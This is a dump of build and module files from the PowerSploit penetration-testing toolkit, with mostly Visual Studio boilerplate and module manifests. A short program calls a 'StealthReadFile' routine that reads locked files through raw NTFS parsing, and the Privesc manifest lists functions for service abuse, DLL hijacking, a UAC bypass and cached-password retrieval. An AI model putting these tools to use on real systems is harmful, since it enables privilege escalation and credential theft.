file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : logon Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this logon DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your logon application. 9 | 10 | 11 | logon.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | logon.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | logon.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named logon.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // logon.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include "targetver.h" 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | 24 | 25 | // TODO: reference additional headers your program requires here 26 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32 16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64 17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64 18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32 19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32 20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64 21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_Attribute.h" 21 | #include "NTFS_Common.h" 22 | #include "NTFS_DataType.h" 23 | #include "NTFS_FileRecord.h" 24 | 25 | using namespace std; 26 | 27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*); 28 | 29 | int _tmain(int argc, _TCHAR* argv[]) 30 | { 31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll"); 32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile"); 33 | 34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress; 35 | 36 | DWORD buffSize = 1024*1024; 37 | BYTE* buffer = new BYTE[buffSize]; 38 | DWORD bytesRead = 0; 39 | ULONGLONG bytesLeft = 0; 40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft); 41 | 42 | cout << "Return value: " << ret << endl; 43 | 44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary); 45 | myFile.write((char*)buffer, bytesRead); 46 | 47 | return 0; 48 | } 49 | 50 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | 44 | 45 | Source Files 46 | 47 | 48 | Source Files 49 | 50 | 51 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : NTFSParser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParser application. 9 | 10 | 11 | NTFSParser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParser.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | // TODO: reference additional headers your program requires here 18 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParser/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h: -------------------------------------------------------------------------------- 1 | /* 2 | * NTFS include files 3 | * 4 | * Copyright(C) 2010 cyb70289 5 | * 6 | * This program/include file is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU General Public License as published 8 | * by the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program/include file is distributed in the hope that it will be 12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | */ 16 | 17 | #ifndef __NTFS_H_CYB70289 18 | #define __NTFS_H_CYB70289 19 | 20 | #pragma pack(8) 21 | 22 | #include "NTFS_Common.h" 23 | #include "NTFS_FileRecord.h" 24 | #include "NTFS_Attribute.h" 25 | 26 | #pragma pack() 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParserDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParserDLL application. 9 | 10 | 11 | NTFSParserDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParserDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParserDLL.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | // dllmain.cpp : Defines the entry point for the DLL application. 19 | #include "stdafx.h" 20 | 21 | BOOL APIENTRY DllMain( HMODULE hModule, 22 | DWORD ul_reason_for_call, 23 | LPVOID lpReserved 24 | ) 25 | { 26 | switch (ul_reason_for_call) 27 | { 28 | case DLL_PROCESS_ATTACH: 29 | case DLL_THREAD_ATTACH: 30 | case DLL_THREAD_DETACH: 31 | case DLL_PROCESS_DETACH: 32 | break; 33 | } 34 | return TRUE; 35 | } 36 | 37 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // NTFSParserDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | 18 | // TODO: reference additional headers your program requires here 19 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Exfiltration/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Exfiltration` 7 | 8 | To see the commands imported, type `Get-Command -Module Exfiltration` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/LICENSE: -------------------------------------------------------------------------------- 1 | PowerSploit is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2012, Matthew Graeber 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 15 | 16 | 17 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Mayhem/Mayhem.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Mayhem.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Mayhem Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Mayhem/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Mayhem` 7 | 8 | To see the commands imported, type `Get-Command -Module Mayhem` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/Persistence/Persistence.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Persistence.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Persistence Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Persistence/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module Persistence` 7 | 8 | To see the commands imported, type `Get-Command -Module Persistence` 9 | 10 | For help on each individual command, Get-Help is your friend. -------------------------------------------------------------------------------- /powershell/PowerSploit/PowerSploit.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking } 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/PowerSploit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.23107.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU 15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU 16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Privesc/Privesc.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Privesc.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' 11 | 12 | # Author of this module 13 | Author = 'Will Schroeder (@harmj0y)' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Privesc Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = @( 26 | 'Get-ModifiablePath', 27 | 'Get-ProcessTokenGroup', 28 | 'Get-ProcessTokenPrivilege', 29 | 'Enable-Privilege', 30 | 'Add-ServiceDacl', 31 | 'Set-ServiceBinaryPath', 32 | 'Test-ServiceDaclPermission', 33 | 'Get-UnquotedService', 34 | 'Get-ModifiableServiceFile', 35 | 'Get-ModifiableService', 36 | 'Get-ServiceDetail', 37 | 'Invoke-ServiceAbuse', 38 | 'Write-ServiceBinary', 39 | 'Install-ServiceBinary', 40 | 'Restore-ServiceBinary', 41 | 'Find-ProcessDLLHijack', 42 | 'Find-PathDLLHijack', 43 | 'Write-HijackDll', 44 | 'Get-RegistryAlwaysInstallElevated', 45 | 'Get-RegistryAutoLogon', 46 | 'Get-ModifiableRegistryAutoRun', 47 | 'Get-ModifiableScheduledTaskFile', 48 | 'Get-UnattendedInstallFile', 49 | 'Get-WebConfig', 50 | 'Get-ApplicationHost', 51 | 'Get-SiteListPassword', 52 | 'Get-CachedGPPPassword', 53 | 'Write-UserAddMSI', 54 | 'Invoke-EventVwrBypass', 55 | 'Invoke-PrivescAudit', 56 | 'Get-System' 57 | ) 58 | 59 | # List of all files packaged with this module 60 | FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md' 61 | 62 | } 63 | -------------------------------------------------------------------------------- /powershell/PowerSploit/Privesc/Privesc.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | 